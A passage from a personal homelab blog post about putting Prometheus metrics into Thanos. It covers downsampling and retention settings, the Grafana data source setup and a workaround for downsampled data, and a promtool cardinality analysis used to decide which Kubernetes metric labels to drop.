above, I&rsquo;ve gathered quite a lot of data over the years, and I wanted to at least
reduce it a little bit.</p>
<p>What I figured was that I probably didn&rsquo;t need raw precision data for the whole
five years. So I decided to set <code>--retention.resolution-raw</code> to two years.
This means that all data will be retained at full precision for two years. That
should be enough, even for a graph connoisseur like myself. Most of the time when
I look at older data I don&rsquo;t look at it closely zoomed in, but rather I look at
very long time frames for a metric. I then set the 5 minute precision
retention to my previous five years, which is still a lot of precision for a long
time frame. Finally, I indulged a little bit and set the 1 hour precision to
never be deleted, so I will always have at least that precision available for
any data I ever gathered.</p>
<p>One thing has to be clear with this downsampling: The way I&rsquo;ve configured it,
it will not actually reduce the overall size of the TSDB. Quite the contrary,
it will <em>increase</em> the size, because for at least the first two years I&rsquo;m
keeping the full precision data, and I&rsquo;m also adding two more blocks for every
raw precision block: one at 5m precision, and one at 1h.</p>
<p>I started out at around 250 GB worth of metrics data. After the downsampling
ran through, I ended up with about 343 GB. Well, it&rsquo;s good that reducing the size
was not a goal of the entire exercise. &#x1f605;</p>
<p>Running on a Raspberry Pi 4 worker node, working off of a Ceph RBD backed by
a SATA SSD, the downsampling of the data since February 2021 took about 19.5h
in total. That&rsquo;s the overall time for computing the blocks for both 1h and 5m
precision.</p>
<p>Before continuing to the Grafana configuration, I would like to highlight another
nice feature of Thanos, the block viewer:
<figure>
    <img loading="lazy" src="thanos-blocks-overview.png"
         alt="A screenshot of Thanos block viewer web UI. It displays information on the TSDB blocks currently in the S3 bucket. At the bottom is a timeline from 2021-02-05 to 2025-05-05. Above it are multiple rows of blocks in different colors. From the start to June 2024, they all have the same size, representing 20 day blocks. There are three rows, representing the raw precision, 1h precision and 5m precision blocks. After that, there&#39;s another triplet of rows going up to mid-April 2025 in different colors. There&#39;s also a set of shorter blocks, representing 7 days, in December 2024, followed again by longer 20 day blocks. Coming closer to today, the 20 day blocks are first replaced with 7 day blocks, then 2 day blocks, then 8h blocks and finally 2h blocks for the most recent ones. To the right of this graph, an information window is showing some info about the selected block. It contains the block&#39;s start and end time. Here, September 20 2024 8 PM to October 11 2024 2 AM. It shows that the block contains over 250k series, with over 7 billion samples. The total size is given as 8.31 GiB, of which 93%, or 7.81 GiB, are the Chunks with the samples and 515.95 MiB the index. It also shows that the ingestion rate for that block is about 420.27 MiB per day. Finally, it shows the Resolution as &#39;0&#39;, meaning raw data, the level is 6, meaning it has been compacted 6 times, and then the source is given as the sidecar, meaning this block was uploaded directly from Prometheus and not further compacted by Thanos."/> <figcaption>
            <p>A screenshot of the TSDB in the bucket, taken shortly after downsampling was done.</p>
        </figcaption>
</figure>
</p>
<p>This is a really nice tool for getting a general overview of the TSDB. It allowed
me to see how the ingestion rate has increased over time. I will go into details
later, but first, here is the configuration to get this view, starting with a
Service for the Compactor:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-compactor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">ClusterIP</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">thanos-compactor</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-compactor-http</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">compactor-http</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span></code></pre></div><p>Then I added the following IngressRoute to make it available via my Traefik ingress:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">IngressRoute</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-block-viewer</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#e6db74">&#34;block-viewer.example.com&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/target</span>: <span style="color:#e6db74">&#34;ingress.example.com&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">entryPoints</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">routes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Rule</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">match</span>: <span style="color:#ae81ff">Host(`block-viewer.example.com`)</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">services</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-compactor</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">monitoring</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">port</span>: <span style="color:#ae81ff">thanos-compactor-http</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">http</span>
</span></span></code></pre></div><p>Another important setting is the <code>--disable-admin-operations</code> flag on the Compactor
container. This disables some write operations you could do via the web UI, like
marking a block for deletion or marking a block as not to be compacted. Because
there&rsquo;s no authentication of any kind available, I disabled these functions.</p>
<h2 id="configuring-grafana">Configuring Grafana</h2>
<p>Initially, I configured a separate data source for Thanos via the <code>values.yaml</code>
file of the kube-prometheus-stack chart, like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">grafana</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">datasources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">datasource.yaml</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">editable</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">datasources</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">prometheus</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">access</span>: <span style="color:#ae81ff">proxy</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">url</span>: <span style="color:#ae81ff">http://thanos-querier.monitoring.svc.cluster.local:10902</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">isDefault</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">prometheusType</span>: <span style="color:#ae81ff">Thanos</span>
</span></span></code></pre></div><p>With that, I was able to verify that I could query all of the data, so I then
reconfigured Prometheus to only have a 24h retention:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">prometheus</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">prometheusSpec</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">retention</span>: <span style="color:#ae81ff">24h</span>
</span></span></code></pre></div><p>Prometheus then dutifully removed all of the old blocks in very short order,
reducing the size of the TSDB to only about 1.5 GiB. I had wanted to reduce the
size of the volume as well, but found that while volume sizes can be increased
in Kubernetes, shrinking them is currently not implemented. I will have to
create a fresh volume and copy the data over, and decided to put that off to
another day. But I was able to free the space in the Ceph cluster by running
this command on the host where the Prometheus Pod was running:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>fstrim /var/lib/kubelet/pods/82278fd5-0903-4bdc-b128-562028e435bd/volume-subpaths/pvc-7f0e51e6-40c4-4880-8b52-169c5d1fcdef/prometheus/2
</span></span></code></pre></div><p>With that command, Linux discards unused blocks in the filesystem, and in the case of a
Ceph RBD, it frees up space in the cluster because RBDs are sparse by default.
That took about 20 minutes to run through.</p>
<p>But now back to Grafana. While querying Thanos did work, I happened to
have <code>kubectl logs</code> running against the Thanos Store when I went to Grafana&rsquo;s
<a href="https://grafana.com/docs/grafana/latest/explore/simplified-exploration/metrics/">Drilldown page</a>,
and the logs were flooded with messages like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;caller&#34;</span>:<span style="color:#e6db74">&#34;memcached.go:175&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;err&#34;</span>:<span style="color:#e6db74">&#34;the async buffer is full&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;error&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;failed to cache series in memcached&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ts&#34;</span>:<span style="color:#e6db74">&#34;2025-05-03T22:00:11.260316949Z&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>And when I say &ldquo;flooded&rdquo;, I mean <em>flooded</em>:
<figure>
    <img loading="lazy" src="store-logs.png"
         alt="A screenshot of a Grafana log volume graph. It shows very large log amounts up to 5k log events per second, with some multi-second periods of constant 2k logs per second."/> <figcaption>
            <p>There were a lot of logs.</p>
        </figcaption>
</figure>
</p>
<p>Digging a little bit, I found <a href="https://github.com/thanos-io/thanos/issues/1979#issuecomment-573205791">this issue</a>,
which noted that the problem was the <code>max_async_buffer_size</code> setting in the cache
config. I bumped it up to <code>100000</code> (the value already shown in the cache ConfigMap
above) and the error mostly went away.</p>
<p>Now I needed to switch all of my dashboards over to using the Thanos data source
instead of going directly to Prometheus. The issue: I had the &ldquo;Prometheus&rdquo;
data source configured in all of my Grafana panels, and I did not want to go
through all of them and change them to the Thanos source.</p>
<p>I ended up just replacing the original Prometheus source with Thanos in the
data source config. For that, I first had to disable the default source that the
kube-prometheus-stack Helm chart configures:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">grafana</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">sidecar</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">datasources</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">defaultDatasourceEnabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">isDefaultDatasource</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>Next, I added Thanos as a data source called &ldquo;Prometheus&rdquo;:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">grafana</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">datasources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">datasource.yaml</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">datasources</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Prometheus</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">uid</span>: <span style="color:#ae81ff">prometheus</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">prometheus</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">access</span>: <span style="color:#ae81ff">proxy</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">url</span>: <span style="color:#ae81ff">http://thanos-querier.monitoring.svc.cluster.local:10902</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">isDefault</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">prometheusType</span>: <span style="color:#ae81ff">Thanos</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">jsonData</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">customQueryParameters</span>: <span style="color:#e6db74">&#34;max_source_resolution=auto&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">deleteDatasources</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">orgId</span>: <span style="color:#ae81ff">1</span>
</span></span></code></pre></div><p>I also used the <code>deleteDatasources</code> entry to have the Grafana provisioning
functionality, documented <a href="https://grafana.com/docs/grafana/latest/administration/provisioning/">here</a>,
remove my temporary Thanos source.</p>
<p>This had the desired effect, and I was able to query all of the data through
Thanos without having to go into every panel and change the data source.</p>
<p>Then, as intended, the Thanos retention removed all raw precision data older than
two years. I then wanted to make sure that everything still worked. And I was
pretty shocked to see that the answer seemed to be &ldquo;no&rdquo;. Here is a plot of the
<code>node_load1{}</code> metric in May 2023:</p>
<p><figure>
    <img loading="lazy" src="empty-raw-data.png"
         alt="A screenshot of a Grafana time series plot. What the plot shows is not important here. The important part is that the beginning of the plot, from May 1st to about the middle of May 3rd, the plot is empty. Data only starts after that."/> <figcaption>
            <p>Data for normal queries only starts in the middle of May 3rd, even though I definitely had data blocks, both 5m and 1h precision, right back to February 2021.</p>
        </figcaption>
</figure>

That was rather unsettling. After a quick check, I found that I definitely had
data, both in 5m and 1h downsampled state, right back to February 2021. But
for some reason, Grafana didn&rsquo;t show it. I tried a couple of my dashboards,
and interestingly found that on some, data was indeed shown - namely when the
panel was only half width, instead of spanning the entire dashboard. Funnily
enough, making the browser window smaller would also bring the data back. After
some more trial-and-error, I found that this was due to the step width changing
when the panel got smaller. There are fewer pixels per data point available, and
so Grafana increases the distance between the data points it requests from the
source.</p>
<p>Initially, I thought that just adding the <code>--query.auto-downsampling</code> flag to the
command line flags of the Querier would fix the problem, because that was what
showed up in several similar issues reported in the Thanos bug tracker and the
wider Internet. But it had no effect at all. There is even <a href="https://github.com/grafana/grafana/issues/30662">a Grafana issue</a>
about it, but it was rejected.</p>
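<p>For reference, this is roughly where that flag would go, assuming the Querier runs
as a plain Kubernetes Deployment - the snippet below is a hypothetical excerpt for
illustration, not my actual manifest:</p>
<pre tabindex="0"><code>containers:
  - name: thanos-querier
    args:
      - query
      - --http-address=0.0.0.0:10902
      # Lets the Querier choose a downsampling level based on the query step,
      # instead of always asking for raw resolution data.
      - --query.auto-downsampling
</code></pre>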
<p>I finally found a serviceable workaround in <a href="https://github.com/grafana/grafana/issues/21713">this issue</a>.
There is seemingly no good way to make use of a single data source and have that
handle downsampled data. It simply doesn&rsquo;t work. But what does work is creating
a second data source, pointing to the same Thanos, and setting <code>max_source_resolution=5m</code>
for that source:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">grafana</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">datasources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">datasource.yaml</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">datasources</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Thanos-5m</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">uid</span>: <span style="color:#ae81ff">thanos5m</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">prometheus</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">access</span>: <span style="color:#ae81ff">proxy</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">url</span>: <span style="color:#ae81ff">http://thanos-querier.monitoring.svc.cluster.local:10902</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">isDefault</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">prometheusType</span>: <span style="color:#ae81ff">Thanos</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">jsonData</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">customQueryParameters</span>: <span style="color:#e6db74">&#34;max_source_resolution=5m&#34;</span>
</span></span></code></pre></div><p>And that solved the issue. Using that data source, I&rsquo;m getting data past the
end of the raw resolution data in the TSDB without having to configure anything
else. And because I only very occasionally, and then very intentionally, look
at data older than a year or so, I don&rsquo;t have a problem with having to explicitly
set a different data source.</p>
<p>I would have really liked it if this were handled automatically, either by Grafana or
by the Querier, but that just doesn&rsquo;t seem to be how it works.</p>
<h2 id="reducing-prometheus-metrics-ingestion">Reducing Prometheus metrics ingestion</h2>
<p>With the Thanos block viewer on hand, I was finally able to dig a little bit
deeper into why I had to increase the size of the Prometheus volume so often.
Going back to my oldest raw precision block from May 2023, before the k8s migration,
I saw that that 20 day block had a size of almost exactly 1 GiB, with 49.47 MiB
of data per day. Then looking at the most recent 20 day block, from March/April
2025, that block had a size of 13.61 GiB with 688 MiB per day. Here is a table
with a few milestone blocks:</p>
<table>
  <thead>
      <tr>
          <th>End Date</th>
          <th>Duration</th>
          <th>Size</th>
          <th>Daily</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>2023-05-23</td>
          <td>20d</td>
          <td>1 GiB</td>
          <td>49 MiB</td>
      </tr>
      <tr>
          <td>2024-02-02</td>
          <td>20d</td>
          <td>1.25 GiB</td>
          <td>62 MiB</td>
      </tr>
      <tr>
          <td>2024-03-22</td>
          <td>20d</td>
          <td>7.15 GiB</td>
          <td>361 MiB</td>
      </tr>
      <tr>
          <td>2024-09-20</td>
          <td>20d</td>
          <td>8.51 GiB</td>
          <td>430 MiB</td>
      </tr>
      <tr>
          <td>2024-12-31</td>
          <td>20d</td>
          <td>7.84 GiB</td>
          <td>396 MiB</td>
      </tr>
      <tr>
          <td>2025-03-01</td>
          <td>20d</td>
          <td>10.81 GiB</td>
          <td>546 MiB</td>
      </tr>
      <tr>
          <td>2025-04-11</td>
          <td>20d</td>
          <td>13.61 GiB</td>
          <td>688 MiB</td>
      </tr>
      <tr>
          <td>2025-05-01</td>
          <td>7d</td>
          <td>5.10 GiB</td>
          <td>773 MiB</td>
      </tr>
      <tr>
          <td>2025-05-06</td>
          <td>2d</td>
          <td>1.63 GiB</td>
          <td>834 MiB</td>
      </tr>
      <tr>
          <td>2025-05-12</td>
          <td>2d</td>
          <td>1.42 GiB</td>
          <td>724 MiB</td>
      </tr>
      <tr>
          <td>2025-05-16</td>
          <td>2d</td>
          <td>935 MiB</td>
          <td>467 MiB</td>
      </tr>
  </tbody>
</table>
<p>It&rsquo;s pretty clear that the massive jump came from the k8s scraping, which I
enabled in March 2024. For the rest of 2024, the daily intake was reasonably
stable though. But then, starting in 2025, it increased pretty seriously again.
I&rsquo;m pretty sure that&rsquo;s because for most of the latter half of 2024, I was working
on my backup operator implementation, so there wasn&rsquo;t much change in the k8s
cluster, and most apps were still running in the Nomad cluster. Then, starting
in 2025, I began to migrate the rest of the services over, which increased
the amount of scraped data considerably. This makes sense, considering that
some of my largest series are probably the per-container metrics scraped from
the kubelet.</p>
<p>As you can see from the last few entries, I made some progress in reducing
the ingest over the last couple of days. I would have loved to show you some
Prometheus ingest plots, but sadly I only realized too late that Prometheus
provides ingest metrics. &#x1f61e;</p>
<p>To analyze the data and find metrics to cut down, I looked directly at the most
recent 20 day block, with data ending on 2025-04-11. I then opened it with
<code>promtool</code>. This works without having the block in any special directory
structure - it doesn&rsquo;t need to sit in a Prometheus TSDB. I just downloaded
it from the S3 bucket with s3cmd.</p>
<p>Then I launched <code>promtool</code> like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>promtool tsdb analyze ./ 01J3CD4846QQYQEJ3XN7VZ5NMH/
</span></span></code></pre></div><p>Here, <code>01J3CD4846QQYQEJ3XN7VZ5NMH</code> is the name of the block to be analyzed,
in my case the newest block of full 20 day size. The result looks like this:</p>
<pre tabindex="0"><code>Block ID: 01JRJ8EHHW12VY9SZX5Z45SSQV
Duration: 485h59m59.948s
Total Series: 367092
Label names: 226
Postings (unique label pairs): 20435
Postings entries (total label pairs): 4101019

Label pairs most involved in churning:
105190 service=monitoring-kube-prometheus-kubelet
105190 endpoint=https-metrics
105190 job=kubelet
102018 metrics_path=/metrics/cadvisor
51674 namespace=vault
50203 container=vault
49917 image=docker.io/hashicorp/vault:1.18.5
43187 job=kube-state-metrics
43187 service=monitoring-kube-state-metrics
43187 endpoint=http
35765 service=kubernetes
35765 namespace=default
35765 job=apiserver
35765 endpoint=https
29513 container=kube-state-metrics
22812 namespace=backups
21820 namespace=kube-system
21620 instance=10.8.11.250:8080
21566 instance=10.8.12.213:8080
20230 namespace=rook-ceph

Label names most involved in churning:
201049 __name__
201049 instance
201049 job
194577 service
194053 endpoint
194053 namespace
155528 pod
143798 container
108242 node
105190 metrics_path
102043 id
94318 name
75452 image
46727 device
38871 uid
32460 le
28929 scope
21394 resource
20692 verb
17317 version

Most common label pairs:
145767 endpoint=https-metrics
145767 job=kubelet
145767 service=monitoring-kube-prometheus-kubelet
128459 service=kubernetes
128459 endpoint=https
128459 namespace=default
128459 job=apiserver
123738 metrics_path=/metrics/cadvisor
62525 component=apiserver
57546 service=monitoring-kube-state-metrics
57546 endpoint=http
57546 job=kube-state-metrics
52926 version=v1
52036 namespace=vault
50810 instance=10.86.5.202:6443
50337 container=vault
50020 image=docker.io/hashicorp/vault:1.18.5
49771 namespace=kube-system
39454 container=kube-state-metrics
33481 scope=cluster

Label names with highest cumulative label value length:
636231 id
252234 name
224352 container_id
136756 mountpoint
41804 __name__
25744 uid
23777 pod
14309 owner_name
14243 created_by_name
12707 device
11585 job_name
11220 type
11194 image_id
7383 resource
5504 csi_volume_handle
4755 client
4465 image
4209 pod_ip
4209 ip
4107 interface

Highest cardinality labels:
3814 id
3528 name
3116 container_id
1316 __name__
1185 mountpoint
718 uid
688 pod
566 device
417 pod_ip
417 ip
354 type
349 owner_name
343 created_by_name
317 client
315 resource
280 interface
216 job_name
188 le
182 container
156 kind

Highest cardinality metric names:
31872 etcd_request_duration_seconds_bucket
25920 apiserver_request_duration_seconds_bucket
21736 apiserver_request_sli_duration_seconds_bucket
15232 container_memory_failures_total
10208 apiserver_request_body_size_bytes_bucket
8092 container_blkio_device_usage_total
6968 apiserver_response_sizes_bucket
6734 container_fs_reads_total
6734 container_fs_writes_total
4590 kube_pod_status_phase
4590 kube_pod_status_reason
4036 container_fs_reads_bytes_total
4036 kubernetes_feature_enabled
4036 container_fs_writes_bytes_total
3808 container_memory_kernel_usage
3808 container_memory_failcnt
3808 container_memory_rss
3808 container_memory_max_usage_bytes
3808 container_oom_events_total
3808 container_memory_working_set_bytes
</code></pre><p>Before I go any deeper, one glaring omission in the output that has me a little
bit confused: There is no indicator of the actual number of samples in a metric
or series. So you get a lot of information about labels and series, but nothing
about the samples besides the initial total number of samples in the block.</p>
<p>So let&rsquo;s look at the information we get. First comes the typical metadata, like
how long the block is and what the oldest and newest timestamps contained in it
are. One headline number is the count of 367092 series. Let me briefly explain
the difference between a series and a metric, taking <code>container_fs_reads_total</code>
as an example. This is a metric - a certain value, gathered from potentially
multiple targets, which has certain labels. A series is then one specific
permutation of those labels&rsquo; values. For example like this:</p>
<pre tabindex="0"><code>container_fs_reads_total{
    container=&#34;POD&#34;,
    device=&#34;/dev/nvme0n1&#34;,
    endpoint=&#34;https-metrics&#34;,
    instance=&#34;300.300.300.1:10250&#34;,
    job=&#34;kubelet&#34;,
    metrics_path=&#34;/metrics/cadvisor&#34;,
    namespace=&#34;rook-cluster&#34;,
    node=&#34;mynode1&#34;,
    pod=&#34;rook-ceph-osd-2-85b8f48c47-p24kc&#34;,
    prometheus=&#34;monitoring/monitoring-kube-prometheus-prometheus&#34;,
    prometheus_replica=&#34;prometheus-monitoring-kube-prometheus-prometheus-0&#34;,
    service=&#34;monitoring-kube-prometheus-kubelet&#34;
}
</code></pre><p>This is one single series of the <code>container_fs_reads_total</code> metric - one specific
combination of label values. From what I understand, these series are the basis
of Prometheus&rsquo; TSDB storage architecture. Having more or fewer samples per series
doesn&rsquo;t make much of a difference for Prometheus, but having many more series
per metric tends to get expensive, leading to a cardinality problem and
significantly increased computational and memory requirements. That&rsquo;s why
the output of <code>promtool</code> focuses on labels and their cardinality, not the number
of samples.</p>
<p>I started out looking at the <code>Label names with highest cumulative label value length</code>
section. If I interpret it right, this is the total length of all values for
that particular label. I then went into Grafana&rsquo;s explore tab and started, well,
exploring. Take the first label, <code>id</code>. Concatenating all values of that label
produces 636k characters. I then chose a random one of the values, which makes
Grafana show you all the metrics using that label+value combination:
<figure>
    <img loading="lazy" src="id-label-values.png"
         alt="A screenshot of Grafana&#39;s explore tab, with the metrics browser open. It shows several selection fields, one of them for labels. The label &#39;id&#39; is chosen, showing that it has 1900 values. A list of those values is also shown, where a random one is currently chosen, starting with &#39;/kubepods.slice/kubepods-burst...&#39;. On the left side is another list with all of the metrics which have that label&#43;value combination. All of them starting with &#39;container_&#39;, and then a lot of different container metrics like &#39;fs_writes_total&#39;."/> <figcaption>
            <p>An example exploration of the &lsquo;id&rsquo; label.</p>
        </figcaption>
</figure>

Note that the label has 1900 values. I then chose a random one of the metrics to
figure out where it&rsquo;s coming from and whether the label is necessary for uniqueness.
Here is an example:</p>
<pre tabindex="0"><code>container_fs_inodes_total{
    container=&#34;install-cni-binaries&#34;,
    device=&#34;/dev/sda2&#34;,
    endpoint=&#34;https-metrics&#34;,

    id=&#34;/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-podcd726cab_879b_4b26_9916_278220f88d5b.slice/crio-3e855297d10572a5e369c72b4194911528becb34ec905da058ca78df3a3286ca.scope&#34;,

    image=&#34;quay.io/cilium/cilium@sha256:1782794aeac951af139315c10eff34050aa7579c12827ee9ec376bb719b82873&#34;,
    instance=&#34;300.300.300.2:10250&#34;,
    job=&#34;kubelet&#34;,
    metrics_path=&#34;/metrics/cadvisor&#34;,
    name=&#34;k8s_install-cni-binaries_cilium-bs8mb_kube-system_cd726cab-879b-4b26-9916-278220f88d5b_1&#34;,
    namespace=&#34;kube-system&#34;,
    node=&#34;control-plane1&#34;,
    pod=&#34;cilium-bs8mb&#34;,
    prometheus=&#34;monitoring/monitoring-kube-prometheus-prometheus&#34;,
    prometheus_replica=&#34;prometheus-monitoring-kube-prometheus-prometheus-0&#34;,
    service=&#34;monitoring-kube-prometheus-kubelet&#34;
}
</code></pre><p>Just looking at the value of the <code>id</code> label, the problem is immediately clear:
The value is not just extremely long, it&rsquo;s probably also unique. A
restart of the container might already result in a new one, and a restart of the
Pod definitely would. But the value is also unnecessary to guarantee uniqueness
of the series - that&rsquo;s already guaranteed by the <code>pod</code> plus <code>container</code> labels.
The same is true for the <code>name</code> label, which has 1902 values and similarly looks
like it might be randomly generated. It too is already covered by the <code>pod</code> plus
<code>container</code> label combination when it comes to uniqueness. So I decided to
completely drop both labels. Note the <code>job</code> and the <code>metrics_path</code>
labels: those indicate where the metric is coming from, namely the kubelet&rsquo;s
cAdvisor scrape. That scrape can be configured via the kube-prometheus-stack <code>values.yaml</code>.</p>
<p>Worth noting here: The chart has separate configs for the different metrics paths
the kubelet offers, which is why looking at the <code>metrics_path</code> label is also important.
I dropped the two labels via this config:</p>
